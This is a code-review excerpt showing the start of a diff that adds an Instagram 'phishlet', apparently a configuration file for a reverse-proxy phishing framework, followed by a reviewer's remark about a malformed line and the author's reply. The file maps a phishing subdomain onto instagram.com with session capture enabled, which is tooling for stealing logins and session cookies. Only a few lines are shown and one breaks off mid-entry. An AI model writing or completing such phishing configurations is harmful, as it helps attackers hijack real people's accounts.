phishlets/instagram.yaml

```diff
@@ -0,0 +1,19 @@
+author: '@prrrrinncee'
+min_ver: '2.2.0'
+proxy_hosts:
+  - {phish_sub: 'www', orig_sub: 'www', domain: 'instagram.com', session: true,$
```

Comment:
blocks never complete, see the end of the line at `true,$`

Reply:
Thanks. Corrected the script